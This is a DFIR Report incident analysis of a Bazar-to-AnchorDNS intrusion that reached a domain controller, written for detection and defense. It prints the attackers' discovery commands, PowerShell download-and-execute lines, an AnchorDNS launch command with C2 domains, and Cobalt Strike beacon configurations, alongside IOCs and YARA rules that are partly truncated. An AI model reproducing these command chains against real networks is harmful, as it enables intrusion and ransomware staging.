# Bazar Drops the Anchor
**thedfirreport.com/2021/03/08/bazar-drops-the-anchor/**
### Intro
March 8, 2021
#### The malware identified as Anchor first entered the scene in late 2018 and has been linked to the same group as Trickbot, due to similarities in code and usage of the two different malware families in the same intrusions. In 2020 the Bazar malware family entered and again many associated it with the same group behind Trickbot.
In an intrusion this past month we saw another link between the 3 families with a Bazar loader bringing in Anchor DNS to facilitate a full domain compromise intrusion. Over a 5 day time frame the threat actors moved from a single endpoint to full domain compromise, and while ransomware deployment was not seen in this intrusion the TTP’s used mirror what we would expect from a big game ransomware crew.
### Case Summary
#### In this case we started with a DocuSign themed Excel maldoc. The excel file failed to bring down the payload but to follow the infection chain we executed the follow on loader. Once Bazar was established the malware quickly injected into the Werfault process to avoid detection. As seen in many intrusions the malware then performed some initial discovery with built-in Microsoft utilities such as Nltest.
-----
#### About an hour after initial execution, a Cobalt Strike beacon was loaded, followed shortly by Anchor. Shortly after Cobalt Strike and Anchor were running, the attackers dumped credentials and began moving laterally, starting with a domain controller.
Once on the domain controller, the threat actors ran additional discovery but then went quiet. Active command and control was maintained by all three malware samples (Bazar, Cobalt Strike, Anchor DNS) over the next 4 days.
During that timeframe, honey documents were interacted with and additional discovery scans were executed. The threat actors were briefly active on day 3 to execute their Get-DataInfo script to collect additional information, which is usually followed closely by Ryuk ransomware.
However, on the fifth day the threat actors access was cut off before final objectives could be accomplished. We assess that the end goal of this intrusion was to execute domain wide ransomware.
### Timeline
-----
### MITRE ATT&CK
-----
### Initial Access
#### A DocuSign themed Excel xls was opened and macros were enabled. Thanks to @ffforward for the document as well as the sandbox run leading up to the xls file.
New #BazarCall #BazarLoader campaigns.
snutrition,net > snutrition,us
obpharmacy,net > obpharmacy,us
XLS https://t.co/rNLglHadGV
EXE https://t.co/D28MoDqSLD
IOCs: https://t.co/mc56wgU8EW pic.twitter.com/GiIlKY4tT0
— TheAnalyst (@ffforward) February 8, 2021
The macro in this maldoc is using Excel 4 Macros.
DocuSign was again the social engineering format of choice.
-----
#### After execution, Excel called out to:
```
https://morrislibraryconsulting[.]com/favicam/gertnm.php
### Execution
#### We saw no further follow on activity from the above execution, potentiality due to the loader site being offline or some other condition not being met. We then executed the follow on malware manually.
Bazar Loader – 14wfa5dfs.exe
About an hour after execution of the above Bazar Loader, Cobalt Strike was executed by the injected Werfault process.
```
-----
#### Shortly after Cobalt Strike was executed, it dropped several Anchor executable files.
AnchorDns was then executed via Cobalt Strike which called cmd and then anchorAsjuster. Notice Asjuster passing two domains to anchor_x64.exe which will be used for C2.
```
C:\Windows\system32\cmd.exe /C C:\Windows\Temp\adf\anchorAsjuster_x64.exe -source=anchorDNS_x64.exe --target=anchor_x64.exe -domain=xyskencevli.com,sluaknhbsoe.com --period=2 --lasthope=2 -guid
### Defense Evasion
#### Bazar quickly moved into a Werfault process to handle command and control communication avoiding making any network connections directly.
```
-----
#### Process injection was also seen in other key system executables such as winlogon.exe.
Cobalt Strike was seen locking access to SMB beacons.
Anchor was also seen triggering process tampering.
-----
### Credential Access
#### The threat actors were seen using remote thread creation to inject into lsass to extract credentials.
The same activity as seen via a the larger process tree.
-----
#### Discovery
Bazar initiated some discovery activity within 10 minutes of executing.
```
net view /all
net view /all /domain
nltest.exe /domain_trusts /all_trusts
net localgroup "administrator"
net group "domain admins" /domain
systeminfo
whoami
reg query hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /v "DisplayName"
/s
reg query hklm\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall /v
"DisplayName" /s
reg query hkcu\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /v "DisplayName"
/s
reg query hkcu\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall /v
"DisplayName" /s
Cobalt Strike initiated the following discovery commands:
net group \"enterprise admins\" /domain
net group \"domain admins\" /domain
systeminfo
```
-----
#### On the domain controller the following discovery was run:
```
nltest /dclist:"DOMAIN.EXAMPLE
nltest /domain_trusts /all_trusts
IEX (New-Object Net.Webclient).DownloadString('"http://127.0.0.1:3672/'); GetNetSubnet
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:45082/'); GetNetComputer -ping
The following PowerShell command was executed from the domain controller.
Decoded:
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:13773/'); ImportModule ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties
*|select DNSHostName, IPv4Address, OperatingSystem, LastLogonDate
Systems were pinged from the domain controller to confirm connectivity.
C:\Windows\system32\cmd.exe /C ping HOSTX
Four days into the intrusion the threat actors dropped and executed Advanced_IP_Scanner_2.5.3850.exe which kicked off a scan of the network.
AWS was used to get the public IP of the infected machine, multiple times.
```
-----
```
checkip.amazonaws.com
#### Minutes before deployment of Ryuk the threat actors usually drop the following files, usually on a domain controller. This time they dropped the files on a domain controller in C:\info
```
-----
#### The exact files were mentioned in our Bazar, No Ryuk report.
start.bat was executed with the following:
```
C:\Windows\system32\cmd.exe /c ""C:\info\start.bat""
This script contents show it to be a wrapper for the PowerShell script Get-DataInfo.ps1
The contents of Get-DataInfo.ps1 show a detailed information collector to provide the threat actor with very specific details of the environment. This includes things like disk size, connectivity, antivirus software, and backup software. The Ryuk group has used this script
```
-----
#### for at least a year as we ve seen them use it multiple times.
This script and files are available @ https://thedfirreport.com/services/
### Lateral Movement
#### Two hours post initial access the threat actors began lateral movement to one of the domain controllers using PowerShell, which was executed via a remote service, which launched Cobalt Strike
Reviewing the PowerShell script we can extract the shellcode and run it through scdbg to find the pipe used by the beacon.
Thanks to 0xtornado and @mattnotmax for this recipe!
The threat actors also used SMB beacons executed by remote services as well. We saw this across most machines in the domain.
-----
#### The threat actors also used RDP to login to multiple machines within the domain.
### Collection
#### We did not witness collection events but we do believe files were collected and exfiltrated over encrypted C2 channels.
### Command and Control
#### Bazar:
34.210.71[.]206
```
Certificate:[ec:c8:db:01:a4:a3:17:36:54:a2:f5:06:44:84:5c:f6:25:6e:4f:74 ]
Not Before:2021/02/04 02:59:01
Not After2022/02/04 02:59:01
Issuer Org: Global Security
Subject Common: example.com
Subject Org: Global Security
Public Algorithm:rsaEncryption
JA3: 51c64c77e60f3980eea90869b68c58a8
JA3s: e35df3e00ca4ef31d42b34bebaa2f86e
Certificate: [06:32:21:0b:8b:a2:a7:3c:47:a4:33:53:11:a3:11:08:59:48:31:e2 ]
Not Before 2020/06/12 20:00:00
Not After 2021/05/22 08:00:00
Issuer Org: Amazon
Subject Common: *.v.m2.uw2.app.chime.aws [*.v.m2.uw2.app.chime.aws ]
Public Algorithm: rsaEncryption
JA3:fc54e0d16d9764783542f0146a98b300
JA3s:9e4af711131ebfb2a0cff53c4f2d64e6
```
-----
#### We observed the Bazar malware inject into a WerFault process to perform ongoing command and control communication.
Anchor:
The AnchorDNS malware performed C2 over DNS to the following domains:
```
xyskencevli.com
sluaknhbsoe.com
```
-----
#### Cobalt Strike:
195.123.217[.]45
```
JARM: 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
Certificate: [3c:bb:96:de:a7:d7:7a:7d:61:10:7c:53:e3:d0:f5:70:43:54:61:2e ]
Not Before: 2021/02/08 03:45:51
Not After: 2021/05/09 04:45:51
Issuer Org: Let's Encrypt
Subject Common: gloomix.com [gloomix.com,www.gloomix.com ]
Public Algorithm: rsaEncryption
Cobalt Strike Config:
```
-----
```
| grab_beacon_config:
| x86 URI Response:
| BeaconType: 0 (HTTP)
| Port: 80
| Polling: 45000
| Jitter: 37
| Maxdns: 255
| C2 Server: 195.123.217.45,/jquery-3.3.1.min.js
| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
| HTTP Method Path 2: /jquery-3.3.2.min.js
| Header1:
| Header2:
| PipeName:
| DNS Idle: J}\xC4q
| DNS Sleep: 0
| Method1: GET
| Method2: POST
| Spawnto_x86: %windir%\syswow64\dllhost.exe
| Spawnto_x64: %windir%\sysnative\dllhost.exe
| Proxy_AccessType: 2 (Use IE settings)
|
|
| x64 URI Response:
| BeaconType: 0 (HTTP)
| Port: 80
| Polling: 45000
| Jitter: 37
| Maxdns: 255
| C2 Server: 195.123.217.45,/jquery-3.3.1.min.js
| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
| HTTP Method Path 2: /jquery-3.3.2.min.js
| Header1:
| Header2:
| PipeName:
| DNS Idle: J}\xC4q
| DNS Sleep: 0
| Method1: GET
| Method2: POST
| Spawnto_x86: %windir%\syswow64\dllhost.exe
| Spawnto_x64: %windir%\sysnative\dllhost.exe
| Proxy_AccessType: 2 (Use IE settings)
|_
443/tcp open https
| grab_beacon_config:
| x86 URI Response:
| BeaconType: 8 (HTTPS)
| Port: 443
| Polling: 45000
| Jitter: 37
| Maxdns: 255
| C2 Server: gloomix.com,/jquery-3.3.1.min.js
| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
| HTTP Method Path 2: /jquery-3.3.2.min.js
| Header1:
| Header2:
```
-----
```
| PipeName:
| DNS Idle: J}\xC4q
| DNS Sleep: 0
| Method1: GET
| Method2: POST
| Spawnto_x86: %windir%\syswow64\dllhost.exe
| Spawnto_x64: %windir%\sysnative\dllhost.exe
| Proxy_AccessType: 2 (Use IE settings)
|
|
| x64 URI Response:
| BeaconType: 8 (HTTPS)
| Port: 443
| Polling: 45000
| Jitter: 37
| Maxdns: 255
| C2 Server: gloomix.com,/jquery-3.3.1.min.js
| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
| HTTP Method Path 2: /jquery-3.3.2.min.js
| Header1:
| Header2:
| PipeName:
| DNS Idle: J}\xC4q
| DNS Sleep: 0
| Method1: GET
| Method2: POST
| Spawnto_x86: %windir%\syswow64\dllhost.exe
| Spawnto_x64: %windir%\sysnative\dllhost.exe
| Proxy_AccessType: 2 (Use IE settings)
|_
#### ~tmp01925d3f.exe can be seen communicating with the Cobalt Strike C2 channel.
### Exfiltration
```
-----
#### No exfiltration was observed but honey docs were taken off network and opened by the threat actors from remote locations. We assess that this exfiltration was performed over an encrypted C2 channel. This exfiltration has been going on for months and is rarely talked about when it comes to Wizard Spider.
### Impact
#### We believe this intrusion would have ended with domain wide ransomware. The deployment of the Get-DataInfo.ps1 script and overall TTP’s used in the intrustion are consistent with threat actors associated with deployments of the Ryuk ransomware family.
Enjoy our report? Please consider donating $1 or more using Patreon. Thank you for your support!
We also have pcaps, memory captures, scripts, executables, and Kape packages available here
### IOCs
#### If you would like access to our internal MISP and/or threat feeds please see here.
### Network
-----
```
54.176.158.165
54.193.234.163
54.241.149.90
208.100.26.238
63.251.235.71
34.210.71.206
195.123.217.45
gloomix.com
https://morrislibraryconsulting.com/favicam/gertnm.php
xyskencevli.com
sluaknhbsoe.com
### File
request_form_1612805504.xls
58eaac6124749d0e93df6d05a4380c22
7e14c560484cb7e8ae065224a7d4978b9939ef9a
d9b13ef49c80375e0a8cf20b840b1e8283b35c1a1a6adcbb4173eb25490530e0
~tmp01925d3f.exe
ef7047a0ca52ef7f4d20281b50207f71
61d8f56452fd9df5952fac84f10ea8520ed5958c
10ff83629d727df428af1f57c524e1eaddeefd608c5a317a5bfc13e2df87fb63
anchorAsjuster_x64.exe
9fbc3d560d075f33a15aa67ae74ac6ef
a298c6f5f8902fb581a1b5b922f95b362747f9a7
3ab8a1ee10bd1b720e1c8a8795e78cdc09fec73a6bb91526c0ccd2dc2cfbc28d
anchorDNS_x64.exe
7160ac4abb26f0ca4c1b6dfba44f8d36
3820ff0d04a233745c79932b77eccfe743a81d34
9fdbd76141ec43b6867f091a2dca503edb2a85e4b98a4500611f5fe484109513
anchor_x64.exe
0be407690fd049ea640dfc64a80c7b2a
c9c4ef9b8b39c584d554de8afeb2be6f5648aa6d
ca72600f50c76029b6fb71f65423afc44e4e2d93257c3f95fb994adc602f3e1b
14wfa5dfs.exe
9a16a348d3f4e7da3e8746667624115f
bebdec590d2a2fffaecb970b73e3067294c9125b
2065157b834e1116abdd5d67167c77c6348361e04a8085aa382909500f1bbe69
extracted-cobalt-strike-beacon.exe
49dc44dfa14a76e139bf5efb4a78aca6
a47fc79bc1f0da5d292a986acdbe9057d3dd15c9
738018c61a8db247615c9a3290c26fbbc4e230d5fbe00c4312401b90813c340c
PDB paths
anchordns_x64.exe - z:\d\git\anchordns.llvm\bin\x64\release\anchordns_x64.pdb
anchor_x64.exe - z:\d\git\anchordns.llvm\bin\x64\release\anchordns_x64.pdb
~tmp01925d3f.exe - c:\users\hillary\source\repos\gromyko\release\gromyko.pdb
Accessed Honey Docs
```
-----
```
IP: 23.94.51[.]80
UA: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0;
MSOffice 12)
## Detections
### Network
ET INFO Observed DNS Query for EmerDNS TLD (.bazar)
ETPRO POLICY External IP Check (checkip.amazonaws.com)
ETPRO TROJAN Win32/TrickBot Anchor Variant Style External IP Check
ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
ET SCAN Behavioral Unusual Port 139 traffic Potential Scan or Infection
ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot
CnC)
ETPRO POLICY Possibly Suspicious example.com SSL Cert
ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
Sigma
#### https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_p owershell_enc_cmd.yml
https://github.com/Neo23x0/sigma/blob/084cd39505861188d9d8f2d5c0f2835e4f750a3f/rules /windows/process_creation/win_malware_trickbot_recon_activity.yml
https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_co mmands_recon_activity.yml
https://github.com/Neo23x0/sigma/blob/c56cd2dfff6343f3694ef4fd606a305415599737/rules/ network/net_dns_c2_detection.yml
### Yara
```
-----
```
/
YARA Rule Set
Author: The DFIR Report
Date: 2021-02-22
Identifier: 1017 Anchoring Bazar
Reference: https://thedfirreport.com
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule bazar_14wfa5dfs {
meta:
description = "files - file 14wfa5dfs.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-02-22"
hash1 = "2065157b834e1116abdd5d67167c77c6348361e04a8085aa382909500f1bbe69"
strings:
$s1 =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ascii /* base64 encoded string '' */
$s2 =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ascii /* base64 encoded string '' */
$s3 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s4 = "0??dfg.dll ASHI128 bit 98tqewC58752F9578" fullword ascii
$s5 = "*http://crl4.digicert.com/assured-cs-g1.crl0L" fullword ascii
$s6 = "*http://crl3.digicert.com/assured-cs-g1.crl00" fullword ascii
$s7 = "/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L" fullword ascii
$s8 = "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={F61A86A8-0045-3726-D207E8A923987AD2}&lang=ru&browser=4&usagestats=1&appname" ascii
$s9 = "operator co_await" fullword ascii
$s10 = "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={F61A86A8-0045-3726-D207E8A923987AD2}&lang=ru&browser=4&usagestats=1&appname" ascii
$s11 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
$s12 = "Google LLC1" fullword ascii
$s13 = "Google LLC0" fullword ascii
$s14 = "Unknown issuer0" fullword ascii
$s15 = "DigiCert, Inc.1$0\"" fullword ascii
$s16 = "=Google%20Chrome&needsadmin=prefers&ap=x64-stablestatsdef_1&installdataindex=empty" fullword ascii
$s17 = "TIMESTAMP-SHA256-2019-10-150" fullword ascii
$s18 = "vggwqrwqr7d6" fullword ascii
$s19 = "api-ms-win-core-file-l1-2-2" fullword wide /* Goodware String - occured 1
times */
$s20 = "__swift_2" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 3000KB and
( pe.imphash() == "d8af53b239700b702d462c81a96d396c" or 8 of them )
}
```
-----
```
rule cobalt_strike_tmp01925d3f {
meta:
description = "files - file ~tmp01925d3f.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-02-22"
hash1 = "10ff83629d727df428af1f57c524e1eaddeefd608c5a317a5bfc13e2df87fb63"
strings:
$x1 = "C:\\Users\\hillary\\source\\repos\\gromyko\\Release\\gromyko.pdb" fullword
ascii
$x2 = "api-ms-win-core-synch-l1-2-0.dll" fullword wide /* reversed goodware string
'lld.0-2-1l-hcnys-eroc-niw-sm-ipa' */
$s3 = "gromyko32.dll" fullword ascii
$s4 = "" fullword ascii
$s5 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s6 = "https://sectigo.com/CPS0" fullword ascii
$s7 = "2http://crl.comodoca.com/AAACertificateServices.crl04" fullword ascii
$s8 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword
ascii
$s9 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii
$s10 = "http://ocsp.sectigo.com0" fullword ascii
$s11 = "2http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s" fullword ascii
$s12 = "2http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#" fullword ascii
$s13 = "http://www.digicert.com/CPS0" fullword ascii
$s14 = "AppPolicyGetThreadInitializationType" fullword ascii
$s15 = "[email protected]" fullword ascii
$s16 = "gromyko.inf" fullword ascii
$s17 = "operator<=>" fullword ascii
$s18 = "operator co_await" fullword ascii
$s19 = "gromyko" fullword ascii
$s20 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and
( pe.imphash() == "1b1b73382580c4be6fa24e8297e1849d" or ( 1 of ($x*) or 4 of them ) )
}
rule advanced_ip_scanner {
meta:
description = "files - file advanced_ip_scanner.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-02-22"
hash1 = "722fff8f38197d1449df500ae31a95bb34a6ddaba56834b13eaaff2b0f9f1c8b"
strings:
$x1 = "
" fullword ascii
$s20 = "www.radmin.com" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 5000KB and
( pe.imphash() == "a3bc8eb6ac4320e91b7faf1e81af2bbf" or ( 1 of ($x*) or 4 of them ) )
}
rule anchor_x64 {
meta:
description = "files - file anchor_x64.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-02-22"
hash1 = "ca72600f50c76029b6fb71f65423afc44e4e2d93257c3f95fb994adc602f3e1b"
strings:
$x1 = "cmd.exe /c timeout 3 && " fullword wide
$x2 = "
true
" fullword ascii
$s7 = "error write file, written %i bytes, need write %i bytes, error code %i"
fullword ascii
$s8 = "error create file \"%s\", code %i" fullword ascii
$s9 = "guid: %s, shift 0x%08X(%i)" fullword ascii
$s10 = "ault value 15> -guid --count=" fullword ascii
$s11 = "domain: shift 0x%08X(%i)" fullword ascii
$s12 = "